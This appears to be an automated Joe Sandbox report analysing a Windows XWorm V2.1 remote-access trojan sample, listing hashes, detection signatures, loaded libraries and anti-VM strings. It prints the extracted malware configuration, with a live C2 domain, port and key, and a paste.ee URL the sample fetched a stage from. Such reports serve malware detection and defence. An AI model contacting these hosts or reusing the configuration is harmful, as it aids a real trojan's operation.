Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UmJMWJPQ9h.exe

Overview

General Information

Sample name:UmJMWJPQ9h.exe
renamed because original name is a hash value
Original sample name:c8fbdd732dfadeb0eabde5a558ee010f.exe
Analysis ID:1429292
MD5:c8fbdd732dfadeb0eabde5a558ee010f
SHA1:210e30063960380c3d8cd98e33dc5ddb174b8d11
SHA256:eb9813c264d7fa7b04eeeddbff3c011c23f279dab97bc072e4aeb021f1be6544
Tags:32exeXWorm
Infos:

Detection

XWorm
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
AV process strings found (often used to terminate AV products)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • UmJMWJPQ9h.exe (PID: 5680 cmdline: "C:\Users\user\Desktop\UmJMWJPQ9h.exe" MD5: C8FBDD732DFADEB0EABDE5A558EE010F)
    • WerFault.exe (PID: 3168 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 1200 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["trusted420.anondns.net"], "Port": "3133", "Aes key": "3133", "Install file": "USB.exe", "Version": "XWorm V2.1"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    Process Memory Space: UmJMWJPQ9h.exe PID: 5680JoeSecurity_XWormYara detected XWormJoe Security
      SourceRuleDescriptionAuthorStrings
      0.2.UmJMWJPQ9h.exe.86d290.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
        0.2.UmJMWJPQ9h.exe.86d290.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: UmJMWJPQ9h.exeAvira: detected
          Source: 0.2.UmJMWJPQ9h.exe.86d290.1.raw.unpackMalware Configuration Extractor: Xworm {"C2 url": ["trusted420.anondns.net"], "Port": "3133", "Aes key": "3133", "Install file": "USB.exe", "Version": "XWorm V2.1"}
          Source: trusted420.anondns.netVirustotal: Detection: 9%Perma Link
          Source: UmJMWJPQ9h.exeReversingLabs: Detection: 23%
          Source: UmJMWJPQ9h.exeVirustotal: Detection: 31%Perma Link
          Source: UmJMWJPQ9h.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49704 version: TLS 1.2

          Networking

          barindex
          Source: Malware configuration extractorURLs: trusted420.anondns.net
          Source: unknownDNS query: name: paste.ee
          Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
          Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /r/tC4AK HTTP/1.1User-Agent: HimanenHost: paste.ee
          Source: unknownDNS traffic detected: queries for: paste.ee
          Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/5
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AK
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AK&UN
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AKNU6
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AKns
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AKntAD
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 1200
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372480765.0000000000709000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBas.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD vs UmJMWJPQ9h.exe
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXWorm.exe4 vs UmJMWJPQ9h.exe
          Source: UmJMWJPQ9h.exeBinary or memory string: OriginalFilenameBas.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD vs UmJMWJPQ9h.exe
          Source: UmJMWJPQ9h.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 0.2.UmJMWJPQ9h.exe.86d290.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.UmJMWJPQ9h.exe.86d290.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: classification engineClassification label: mal92.troj.evad.winEXE@2/6@1/1
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeMutant created: NULL
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5680
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeFile created: C:\Users\user\AppData\Local\Temp\~DF202E41C03DBD0444.TMPJump to behavior
          Source: UmJMWJPQ9h.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: UmJMWJPQ9h.exeReversingLabs: Detection: 23%
          Source: UmJMWJPQ9h.exeVirustotal: Detection: 31%
          Source: unknownProcess created: C:\Users\user\Desktop\UmJMWJPQ9h.exe "C:\Users\user\Desktop\UmJMWJPQ9h.exe"
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 1200
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: msvbvm60.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: vb6zz.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: asycfilt.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: UmJMWJPQ9h.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: UmJMWJPQ9h.exeStatic file information: File size 3162112 > 1048576
          Source: UmJMWJPQ9h.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x26a000

          Data Obfuscation

          barindex
          Source: 0.2.UmJMWJPQ9h.exe.86d290.1.raw.unpack, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
          Source: UmJMWJPQ9h.exeStatic PE information: real checksum: 0x3095ab should be: 0x310988
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeCode function: 0_2_004058FA push ds; ret 0_2_00405902
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeCode function: 0_2_004038AC push ds; iretd 0_2_00403902
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeCode function: 0_2_00403DD1 push ds; iretd 0_2_00403DD2
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeCode function: 0_2_004079EA push ds; retf 0_2_00407A46
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeCode function: 0_2_00409A1E push ds; iretd 0_2_00409A2F
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeCode function: 0_2_00406F17 push dword ptr [ebp+7Ch]; ret 0_2_00406F1A
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeCode function: 0_2_00407B20 push ds; ret 0_2_00407B2A
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\UmJMWJPQ9h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: Amcache.hve.4.drBinary or memory string: VMware
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: UmJMWJPQ9h.exe, 00000000.00000002.2372782874.00000000008B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
